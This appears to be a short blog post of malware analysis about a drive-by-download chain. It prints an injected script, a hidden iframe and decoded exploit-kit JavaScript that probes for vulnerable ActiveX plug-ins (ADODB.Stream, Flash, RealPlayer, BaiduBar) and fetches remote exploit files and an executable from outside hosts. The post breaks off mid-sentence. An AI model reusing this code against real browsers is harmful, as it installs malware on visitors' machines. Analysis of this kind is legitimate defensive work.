my.stsw5178.cn/1.js

Content of this JS

window.status = "完毕";
document.write("<iframe src=http://c.liuliang000.com/wending09.htm width=2 height=2></iframe>");

Content of wending09.htm

<iframe src=main.htm width=10 height=0></iframe>
<script language="javascript" type="text/javascript" src="http://js.users.51.la/1937043.js"></script>

The decoded JS content for main.htm is
try{var e;var ado=(document.createElement("object"));if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");var as=ado.createobject("Adodb.Stream","")}catch(e){};finally{if(e!="[object Error]"){var a="%dfdf%%D$F^D%SF&DS";document.write("<script src=014.js><\/script>")}else{try{var f;var Flashver=(new ActiveXObject("ShockwaveFlash.ShockwaveFlash.9")).GetVariable("$version").split(",")}catch(f){};finally{if(f!="[object Error]"&&Flashver[2]!="124"&&Flashver[2]!="60"){document.write('<embed src="http://swf.4w4w4w.com/swf/'+Flashver[2]+'.swf"></embed>')}}try{var g;var glworld=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31")}catch(g){};finally{if(g!="[object Error]"){document.write('<iframe style=display:none src="lz.htm"></iframe>')}}try{var h;var real=new ActiveXObject("IERPCtl.IERPCtl.1")}catch(h){};finally{if(h!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=rl.js><\/script>')}}}try{var i;var Baidu=new ActiveXObject("BaiduBar.Tool")}catch(i){};finally{if(i!="[object Error]"){Baidu["\x44\x6c\x6f\x61\x64\x44\x53"]("http://xia.9w9w9w.com/down/abd.cab","abd.exe",0)}}}}
As can be seen some of the exploits are downloaded from

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: